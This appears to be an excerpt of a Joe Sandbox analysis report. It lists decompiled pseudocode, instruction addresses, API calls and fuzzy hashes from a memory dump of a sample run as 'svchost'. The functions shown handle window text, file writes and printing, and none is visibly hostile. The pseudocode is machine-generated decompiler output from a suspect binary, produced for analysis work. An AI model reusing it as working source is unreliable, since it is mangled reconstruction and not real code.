    0x0043b08b
    0x0043b093
    0x0043b099
    0x00000000
    0x0043b099
    0x0043b088
    0x0043b055
    0x00000000
    0x00000000
    0x00000000
    0x0043b023
    0x0043affa

    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: DeleteObject$Release
    • String ID:
    • API String ID: 2600533906-0
    • Opcode ID: 150b7a17ac9a971a76aa34ed861bf5bd673d52cc2d726e88396bc2dce610ea0f
    • Instruction ID: 26de1d5f3897bc6111eeebbaa207b04aaf65d5f64846e8174c675e45759ff76a
    • Opcode Fuzzy Hash: 150b7a17ac9a971a76aa34ed861bf5bd673d52cc2d726e88396bc2dce610ea0f
    • Instruction Fuzzy Hash: 00516FB19002049BDF14DF28C48079A77E5FF58300F08857AED59CF35ADB759949CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040C490(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, int* _a8, int* _a12) {
    				long _v0;
    				int _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v56;
    				char _v64;
    				int _v68;
    				int _v72;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				char _v108;
    				intOrPtr _v112;
    				char _v116;
    				char _v120;
    				intOrPtr _v132;
    				int* _t51;
    				void* _t52;
    				int _t55;
    				void* _t67;
    				intOrPtr _t68;
    				int* _t76;
    				void* _t77;
    				char _t88;
    				char _t93;
    				void* _t109;
    				intOrPtr _t110;
    				void* _t113;
    				intOrPtr _t117;
    				intOrPtr _t119;
    
    				_t109 = __edi;
    				_t77 = __ebx;
    				_push(0xffffffff);
    				_push(E0048DD58);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t119;
    				_t113 = __ecx;
    				_t81 =  *((intOrPtr*)(__ecx + 0x3c));
    				if( *((intOrPtr*)(__ecx + 0x3c)) == 0) {
    					L13:
    					_t51 = _a8;
    					 *_t51 = 0;
    					 *[fs:0x0] = _v12;
    					return _t51;
    				} else {
    					_t52 = E00487648(_t81);
    					if(_t52 == 0) {
    						 *_a8 = 0;
    						 *[fs:0x0] = _v12;
    						return _t52;
    					} else {
    						_t55 = IsWindowVisible( *( *((intOrPtr*)(__ecx + 0x3c)) + 0x1c));
    						if(_t55 == 0) {
    							 *_a8 = 0;
    							 *[fs:0x0] = _v12;
    							return _t55;
    						} else {
    							if( *((intOrPtr*)(_t113 + 0x40)) != 1) {
    								_t117 =  *((intOrPtr*)(_t113 + 0x3c));
    								_v100 = 1;
    								_v96 = 1;
    								_v108 =  *((intOrPtr*)(_t117 + 0xb0));
    								_v104 =  *((intOrPtr*)(_t117 + 0xb4));
    								_v72 = 0;
    								_v68 = 0;
    								_v92 = ((0 |  *((intOrPtr*)(_a4 + 0x10)) >= 0x00000000) - 0x00000001 & 0x000000fe) + 1;
    								E00418A40(0x7d8,  &_v108, 0);
    								goto L13;
    							} else {
    								_t88 =  *0x4b8924; // 0x4b8938
    								_v120 = _t88;
    								_v4 = 0;
    								E0048564F( *((intOrPtr*)(_t113 + 0x3c)),  &_v120);
    								E00481EBD(_t113,  &_v120,  &_v116);
    								_t67 = E004709B8(_t113, _v132);
    								if( *((intOrPtr*)(_v8 + 0x10)) >= 0) {
    									_t93 = _v116;
    									_t68 = _t67 + 1;
    									if(_t68 < _t93 || _t68 > _v112) {
    										goto L10;
    									}
    								} else {
    									_t68 = _t67 - 1;
    									_t93 = _v112;
    									if(_t68 < _v116) {
    										L10:
    										_t68 = _t93;
    									} else {
    										if(_t68 > _t93) {
    											goto L10;
    										}
    									}
    								}
    								wsprintfA( &_v64, 0x4acc9c, _t68, _t109, _t77);
    								E0048754F( *((intOrPtr*)(_t113 + 0x3c)),  &_v56);
    								_t110 =  *((intOrPtr*)(_t113 + 0x3c));
    								SendMessageA( *(_t110 + 0x1c), 0xb1, 0, 0xffffffff);
    								SendMessageA( *(_t110 + 0x1c), 0xb7, 0, 0);
    								E0048768A( *((intOrPtr*)(_t113 + 0x3c)));
    								_v0 = 0xffffffff;
    								E004832C2( &_v116);
    								_t76 = _a12;
    								 *_t76 = 0;
    								 *[fs:0x0] = _v8;
    								return _t76;
    							}
    						}
    					}
    				}
    			}
    0x0040c490
    0x0040c490
    0x0040c496
    0x0040c498
    0x0040c49d
    0x0040c49e
    0x0040c4a9
    0x0040c4ab
    0x0040c4b0
    0x0040c637
    0x0040c637
    0x0040c63f
    0x0040c649
    0x0040c653
    0x0040c4b6
    0x0040c4b6
    0x0040c4bd
    0x0040c681
    0x0040c687
    0x0040c691
    0x0040c4c3
    0x0040c4ca
    0x0040c4d2
    0x0040c65e
    0x0040c668
    0x0040c672
    0x0040c4d8
    0x0040c4e2
    0x0040c5de
    0x0040c5ef
    0x0040c5f3
    0x0040c5fe
    0x0040c602
    0x0040c60b
    0x0040c626
    0x0040c62e
    0x0040c632
    0x00000000
    0x0040c4e8
    0x0040c4e8
    0x0040c4ee
    0x0040c4fa
    0x0040c502
    0x0040c513
    0x0040c51d
    0x0040c531
    0x0040c546
    0x0040c54a
    0x0040c54d
    0x00000000
    0x00000000
    0x0040c533
    0x0040c537
    0x0040c53a
    0x0040c53e
    0x0040c555
    0x0040c555
    0x0040c540
    0x0040c542
    0x00000000
    0x0040c544
    0x0040c542
    0x0040c53e
    0x0040c564
    0x0040c575
    0x0040c57a
    0x0040c590
    0x0040c59f
    0x0040c5a4
    0x0040c5ad
    0x0040c5b8
    0x0040c5bd
    0x0040c5c7
    0x0040c5d1
    0x0040c5db
    0x0040c5db
    0x0040c4e2
    0x0040c4d2
    0x0040c4bd

    APIs
      • Part of subcall function 00487648: IsWindowEnabled.USER32(?), ref: 00487652
    • IsWindowVisible.USER32(?), ref: 0040C4CA
      • Part of subcall function 0048564F: GetWindowTextLengthA.USER32(?), ref: 0048565C
      • Part of subcall function 0048564F: GetWindowTextA.USER32(?,00000000,00000000), ref: 00485674
      • Part of subcall function 00481EBD: SendMessageA.USER32(?,00000466,00000000,00000000), ref: 00481EC9
    • wsprintfA.USER32 ref: 0040C564
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 0040C590
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040C59F
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$MessageSend$Text$EnabledLengthVisiblewsprintf
    • String ID:
    • API String ID: 1914814478-0
    • Opcode ID: 7f6843b00e3a6c143c9f07dd9d013d7023cafb1de238dfd30d83a026e76b7ef1
    • Instruction ID: bd987cdda7fc0f1e3033716245ee201fce7238b823defe85cc8de57dfb77059b
    • Opcode Fuzzy Hash: 7f6843b00e3a6c143c9f07dd9d013d7023cafb1de238dfd30d83a026e76b7ef1
    • Instruction Fuzzy Hash: 15517C75204700AFC724EF14C991B5BB7F5BB88710F108E2EE59A97780DB78E801CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0047AF68(long _a4, void* _a8, long _a12) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				void _v1048;
    				void** _t66;
    				signed int _t67;
    				intOrPtr _t69;
    				signed int _t70;
    				intOrPtr _t71;
    				signed int _t73;
    				signed int _t80;
    				int _t85;
    				long _t87;
    				intOrPtr* _t91;
    				intOrPtr _t97;
    				struct _OVERLAPPED* _t101;
    				long _t103;
    				signed int _t105;
    				struct _OVERLAPPED* _t106;
    
    				_t101 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				if(_a12 != 0) {
    					_t91 = 0x4e1ca0 + (_a4 >> 5) * 4;
    					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
    					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
    					if(__eflags != 0) {
    						E0047BF5F(__eflags, _a4, 0, 2);
    					}
    					_t66 =  *_t91 + _t105;
    					__eflags = _t66[1] & 0x00000080;
    					if((_t66[1] & 0x00000080) == 0) {
    						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
    						__eflags = _t67;
    						if(_t67 == 0) {
    							_a4 = GetLastError();
    						} else {
    							_a4 = _t101;
    							_v12 = _v16;
    						}
    						L15:
    						_t69 = _v12;
    						__eflags = _t69 - _t101;
    						if(_t69 != _t101) {
    							_t70 = _t69 - _v20;
    							__eflags = _t70;
    							return _t70;
    						}
    						__eflags = _a4 - _t101;
    						if(_a4 == _t101) {
    							L25:
    							_t71 =  *_t91;
    							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
    							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
    								L27:
    								 *((intOrPtr*)(E0047213D())) = 0x1c;
    								_t73 = E00472146();
    								 *_t73 = _t101;
    								L24:
    								return _t73 | 0xffffffff;
    							}
    							__eflags =  *_a8 - 0x1a;
    							if( *_a8 == 0x1a) {
    								goto L1;
    							}
    							goto L27;
    						}
    						_t106 = 5;
    						__eflags = _a4 - _t106;
    						if(_a4 != _t106) {
    							_t73 = E004720CA(_a4);
    						} else {
    							 *((intOrPtr*)(E0047213D())) = 9;
    							_t73 = E00472146();
    							 *_t73 = _t106;
    						}
    						goto L24;
    					}
    					__eflags = _a12 - _t101;
    					_v8 = _a8;
    					_a4 = _t101;
    					if(_a12 <= _t101) {
    						goto L25;
    					} else {
    						goto L6;
    					}
    					do {
    						L6:
    						_t80 =  &_v1048;
    						do {
    							__eflags = _v8 - _a8 - _a12;
    							if(_v8 - _a8 >= _a12) {
    								break;
    							}
    							_v8 = _v8 + 1;
    							_t97 =  *_v8;
    							__eflags = _t97 - 0xa;
    							if(_t97 == 0xa) {
    								_v20 = _v20 + 1;
    								 *_t80 = 0xd;
    								_t80 = _t80 + 1;
    								__eflags = _t80;
    							}
    							 *_t80 = _t97;
    							_t80 = _t80 + 1;
    							__eflags = _t80 -  &_v1048 - 0x400;
    						} while (_t80 -  &_v1048 < 0x400);
    						_t103 = _t80 -  &_v1048;
    						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
    						__eflags = _t85;
    						if(_t85 == 0) {
    							_a4 = GetLastError();
    							break;
    						}
    						_t87 = _v16;
    						_v12 = _v12 + _t87;
    						__eflags = _t87 - _t103;
    						if(_t87 < _t103) {
    							break;
    						}
    						__eflags = _v8 - _a8 - _a12;
    					} while (_v8 - _a8 < _a12);
    					_t101 = 0;
    					__eflags = 0;
    					goto L15;
    				}
    				L1:
    				return 0;
    			}

    0x0047af74
    0x0047af79
    0x0047af7c
    0x0047af7f
    0x0047af8e
    0x0047afa0
    0x0047afa3
    0x0047afa8
    0x0047afb0
    0x0047afb5
    0x0047afba
    0x0047afbc
    0x0047afc0
    0x0047b094
    0x0047b09a
    0x0047b09c
    0x0047b0af
    0x0047b09e
    0x0047b0a1
    0x0047b0a4
    0x0047b0a4
    0x0047b050
    0x0047b050
    0x0047b053
    0x0047b055
    0x0047b0eb
    0x0047b0eb
    0x00000000
    0x0047b0eb
    0x0047b05b
    0x0047b05e
    0x0047b0c2
    0x0047b0c2
    0x0047b0c4
    0x0047b0c9
    0x0047b0d7
    0x0047b0dc
    0x0047b0e2
    0x0047b0e7
    0x0047b0bd
    0x00000000
    0x0047b0bd
    0x0047b0ce
    0x0047b0d1
    0x00000000
    0x00000000
    0x00000000
    0x0047b0d1
    0x0047b062
    0x0047b063
    0x0047b066
    0x0047b0b7
    0x0047b068
    0x0047b06d
    0x0047b073
    0x0047b078
    0x0047b078
    0x00000000
    0x0047b066
    0x0047afc9
    0x0047afcc
    0x0047afcf
    0x0047afd2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0047afd8
    0x0047afd8
    0x0047afd8
    0x0047afde
    0x0047afe4
    0x0047afe7
    0x00000000
    0x00000000
    0x0047afec
    0x0047afef
    0x0047aff1
    0x0047aff4
    0x0047aff6
    0x0047aff9
    0x0047affc
    0x0047affc
    0x0047affc
    0x0047affd
    0x0047afff
    0x0047b00a
    0x0047b00a
    0x0047b01a
    0x0047b02f
    0x0047b035
    0x0047b037
    0x0047b082
    0x00000000
    0x0047b082
    0x0047b039
    0x0047b03c
    0x0047b03f
    0x0047b041
    0x00000000
    0x00000000
    0x0047b049
    0x0047b049
    0x0047b04e
    0x0047b04e
    0x00000000
    0x0047b04e
    0x0047af81
    0x00000000

    APIs
    • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0047B02F
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: FileWrite
    • String ID:
    • API String ID: 3934441357-0
    • Opcode ID: 7b42350f713331369749ede0ca77ba3f13e225eaba5b7c3cedbd9e98ea7938b1
    • Instruction ID: 349c951b4c03eaad82187f912ac13991ae29201e047897cbd0d61bdc403550c1
    • Opcode Fuzzy Hash: 7b42350f713331369749ede0ca77ba3f13e225eaba5b7c3cedbd9e98ea7938b1
    • Instruction Fuzzy Hash: 1F516E71900288EFCB11CF68CD84BDE7BB4FF81344F20C1AAE9299B251D7749A41CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00432DA0(void* __ecx, void* __edi, void* __ebp, void* _a4, char _a5, char _a6) {
    				signed int _v0;
    				long _v4;
    				intOrPtr _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _t33;
    				struct HWND__* _t34;
    				void* _t44;
    				signed int _t45;
    				signed int _t48;
    				char _t59;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t75;
    				void* _t78;
    				intOrPtr _t79;
    
    				_t78 = __ebp;
    				_t69 = __edi;
    				_push(0xffffffff);
    				_push(E0048FB28);
    				_t33 =  *[fs:0x0];
    				_push(_t33);
    				 *[fs:0x0] = _t79;
    				_push(__ecx);
    				_t48 = _a4;
    				_t73 = __ecx;
    				if(_t48 < 0x20) {
    					L16:
    					 *[fs:0x0] = _v12;
    					return _t33;
    				} else {
    					if((_t48 & 0x00000080) == 0) {
    						L5:
    						 *0x4c9e04 = 0;
    						_t34 =  *(_t73 + 0x68);
    						if(_t34 == 0 || IsWindow(_t34) == 0) {
    							_a4 = _t48;
    							if((_t48 & 0x00000080) == 0) {
    								_a5 = 0;
    							} else {
    								_a5 = _t48 >> 0x10;
    								_a6 = 0;
    							}
    							_t33 = E004331C0(_t73,  &_a4,  &_a4);
    							goto L16;
    						} else {
    							_t33 = E00484C84(_t78,  *(_t73 + 0x68));
    							_t75 = _t33;
    							if(_t75 == 0) {
    								goto L16;
    							} else {
    								_t59 =  *0x4b8924; // 0x4b8938
    								_push(_t69);
    								_v16 = _t59;
    								_v4 = 0;
    								E0048564F(_t75,  &_v16);
    								SendMessageA( *(_t75 + 0x1c), 0xb1,  *(_v20 - 8), 0xffffffff);
    								SendMessageA( *(_t75 + 0x1c), 0xb7, 0, 0);
    								_v0 = _t48;
    								if((_t48 & 0x00000080) == 0) {
    									_a5 = 0;
    								} else {
    									_a5 = _t48 >> 0x10;
    									_a6 = 0;
    								}
    								SendMessageA( *(_t75 + 0x1c), 0xc2, 0,  &_a4);
    								_v4 = 0xffffffff;
    								_t44 = E004832C2( &_v16);
    								 *[fs:0x0] = _v12;
    								return _t44;
    							}
    						}
    					} else {
    						_t45 =  *0x4c9e04; // 0x0
    						if(_t45 != 0) {
    							_t48 = (_t48 & 0x0000ffff) << 0x00000010 | _t45 & 0x0000ffff;
    							goto L5;
    						} else {
    							 *0x4c9e04 = _t48;
    							 *[fs:0x0] = _v12;
    							return _t45;
    						}
    					}
    				}
    			}

    0x00432da0
    0x00432da0
    0x00432da0
    0x00432da2
    0x00432da7
    0x00432dad
    0x00432dae
    0x00432db5
    0x00432db7
    0x00432dbf
    0x00432dc1
    0x00432ef9
    0x00432eff
    0x00432f09
    0x00432dc7
    0x00432dca
    0x00432dfe
    0x00432dfe
    0x00432e08
    0x00432e0d
    0x00432ed4
    0x00432ed8
    0x00432ee8
    0x00432eda
    0x00432edd
    0x00432ee1
    0x00432ee1
    0x00432ef4
    0x00000000
    0x00432e22
    0x00432e26
    0x00432e2b
    0x00432e2f
    0x00000000
    0x00432e35
    0x00432e35
    0x00432e3b
    0x00432e3c
    0x00432e47
    0x00432e4f
    0x00432e6d
    0x00432e7c
    0x00432e81
    0x00432e85
    0x00432e95
    0x00432e87
    0x00432e8a
    0x00432e8e
    0x00432e8e
    0x00432eaa
    0x00432eb0
    0x00432eb8
    0x00432ec4
    0x00432ece
    0x00432ece
    0x00432e2f
    0x00432dcc
    0x00432dcc
    0x00432dd3
    0x00432dfc
    0x00000000
    0x00432dd5
    0x00432dd5
    0x00432de1
    0x00432deb
    0x00432deb
    0x00432dd3
    0x00432dca

    APIs
    • IsWindow.USER32(?), ref: 00432E14
    • SendMessageA.USER32(?,000000B1,?,000000FF), ref: 00432E6D
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00432E7C
    • SendMessageA.USER32(?,000000C2,00000000,?), ref: 00432EAA
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MessageSend$Window
    • String ID:
    • API String ID: 2326795674-0
    • Opcode ID: 735925222bfde7a94e5c1965392b5419306209860c1cf60619de6be2c9f927ce
    • Instruction ID: d1833186cce305fd34451ed049030a5475bfdc9332e43bce871fdeb49bb5441b
    • Opcode Fuzzy Hash: 735925222bfde7a94e5c1965392b5419306209860c1cf60619de6be2c9f927ce
    • Instruction Fuzzy Hash: DE41A072248741AFD320DB19CD41B6BB7D4EB98720F048A2EE495877D1D3B8D804CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00446F10(signed int __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, long _a40) {
    				int _v4;
    				signed int _v16;
    				intOrPtr* _t36;
    				long _t38;
    				int _t44;
    				signed int _t64;
    				intOrPtr* _t70;
    				intOrPtr* _t74;
    				intOrPtr _t76;
    				signed int _t78;
    				intOrPtr _t84;
    
    				_push(0xffffffff);
    				_push(E004904D3);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t84;
    				_push(__ecx);
    				_t78 = __ecx;
    				_v16 = __ecx;
    				E00484873(__ecx);
    				_t2 = _t78 + 0x64; // 0x64
    				_t74 = _t2;
    				_v4 = 0;
    				 *(_t74 + 4) = 0;
    				 *_t74 = 0x4988e0;
    				 *((intOrPtr*)(__ecx + 0x3c)) = _a16;
    				_t36 = _a8;
    				 *((intOrPtr*)(__ecx)) = 0x498828;
    				 *((intOrPtr*)(__ecx + 0x40)) = _a20;
    				 *(__ecx + 0x44) = 0;
    				_t11 = _t78 + 0x48; // 0x48
    				_t70 = _t11;
    				_v4 = 1;
    				 *_t70 =  *_t36;
    				 *((intOrPtr*)(_t70 + 4)) =  *((intOrPtr*)(_t36 + 4));
    				 *((intOrPtr*)(_t70 + 8)) =  *((intOrPtr*)(_t36 + 8));
    				 *((intOrPtr*)(_t70 + 0xc)) =  *((intOrPtr*)(_t36 + 0xc));
    				_t38 = _a40;
    				 *((intOrPtr*)(__ecx + 0x5c)) = _a36;
    				 *(__ecx + 0x60) = _t38;
    				E00489EBE(_t74, CreateSolidBrush(_t38));
    				if(E0048B3DA(_t78, 0x50800044, _a8, _v4, _a4) != 0) {
    					_t44 = E00489EEB(_a28);
    					 *(_t78 + 0x58) = _t44;
    					SendMessageA( *(_t78 + 0x1c), 0x30, _t44, 0);
    					_t76 = _a20;
    					_t87 = _t76;
    					if(_t76 != 0) {
    						E0048754F(_t78, _t76);
    					}
    					_t64 = _t78;
    					E004471D0(_t64, _t87);
    					if(_a24 == 1) {
    						asm("repne scasb");
    						SendMessageA( *(_t78 + 0x1c), 0xb1,  !(_t64 | 0xffffffff) - 1, 0xffffffff);
    						SendMessageA( *(_t78 + 0x1c), 0xb7, 0, 0);
    					}
    					E0048768A(_t78);
    				}
    				 *[fs:0x0] = _v16;
    				return _t78;
    			}

    0x00446f10
    0x00446f12
    0x00446f1d
    0x00446f1e
    0x00446f25
    0x00446f28
    0x00446f2b
    0x00446f2f
    0x00446f34
    0x00446f34
    0x00446f37
    0x00446f3f
    0x00446f46
    0x00446f58
    0x00446f5b
    0x00446f5d
    0x00446f63
    0x00446f66
    0x00446f6f
    0x00446f6f
    0x00446f72
    0x00446f77
    0x00446f7c
    0x00446f82
    0x00446f8c
    0x00446f8f
    0x00446f94
    0x00446f97
    0x00446fa3
    0x00446fc1
    0x00446fc7
    0x00446fdb
    0x00446fde
    0x00446fe0
    0x00446fe4
    0x00446fe6
    0x00446feb
    0x00446feb
    0x00446ff0
    0x00446ff2
    0x00446ffc
    0x00447003
    0x00447014
    0x00447023
    0x00447023
    0x00447027
    0x00447027
    0x00447035
    0x0044703f

    APIs
    • CreateSolidBrush.GDI32(?), ref: 00446F9A
    • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 00446FDE
    • SendMessageA.USER32(?,000000B1,?,000000FF), ref: 00447014
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00447023
      • Part of subcall function 0048754F: SetWindowTextA.USER32(?,004212EA), ref: 0048755D
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MessageSend$BrushCreateSolidTextWindow
    • String ID:
    • API String ID: 3501373727-0
    • Opcode ID: 011d70481c2db633ce059aa5fc501eba1a313e232633fee74454ebb70b6bd81e
    • Instruction ID: 3ed102fc73cc5fc2bbc401f8fd1c0080af077b488359080c7949eda273387ad4
    • Opcode Fuzzy Hash: 011d70481c2db633ce059aa5fc501eba1a313e232633fee74454ebb70b6bd81e
    • Instruction Fuzzy Hash: B6317E70604700AFD324EF19C851B2AFBE5FB88714F148A1EF55597791CBB8E800CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004125A0(void* __ebp, intOrPtr _a4) {
    				char _v68;
    				int _t24;
    				intOrPtr _t50;
    
    				_t50 = _a4;
    				if( *(_t50 + 0x24c) == 0) {
    					L10:
    					return 0;
    				} else {
    					 *((intOrPtr*)(_t50 + 0xa8)) =  *((intOrPtr*)(_t50 + 0xa8)) + 1;
    					 *((intOrPtr*)(_t50 + 0x244)) = 0;
    					 *((intOrPtr*)(_t50 + 0x240)) = 0;
    					if( *((intOrPtr*)(_t50 + 0x25c)) != 0) {
    						_t24 = EndPage( *(_t50 + 0x24c));
    						 *((intOrPtr*)(_t50 + 0x25c)) = 0;
    						if((0 | _t24 >= 0x00000000) != 0) {
    							goto L5;
    						} else {
    							goto L9;
    						}
    					} else {
    						if(StartPage( *(_t50 + 0x24c)) < 0) {
    							L9:
    							E00412A30(_t50);
    							goto L10;
    						} else {
    							E004127A0(_t50);
    							 *((intOrPtr*)(_t50 + 0x25c)) = 1;
    							if(EndPage( *(_t50 + 0x24c)) < 0) {
    								goto L9;
    							} else {
    								 *((intOrPtr*)(_t50 + 0x25c)) = 0;
    								L5:
    								if( *((intOrPtr*)(_t50 + 0xf4)) != 0) {
    									E00418A40(0x7e2, 0, 0);
    									E0041EF10( *((intOrPtr*)(_t50 + 0xa8)),  &_v68);
    									E0048754F(_t50 + 0x134,  &_v68);
    									UpdateWindow( *(_t50 + 0x150));
    								}
    								return 1;
    							}
    						}
    					}
    				}
    			}

    0x004125a4
    0x004125b1
    0x00412692
    0x00412699
    0x004125b7
    0x004125c6
    0x004125cc
    0x004125d2
    0x004125d8
    0x00412672
    0x0041267a
    0x00412689
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004125de
    0x004125ed
    0x0041268b
    0x0041268d
    0x00000000
    0x004125f3
    0x004125f5
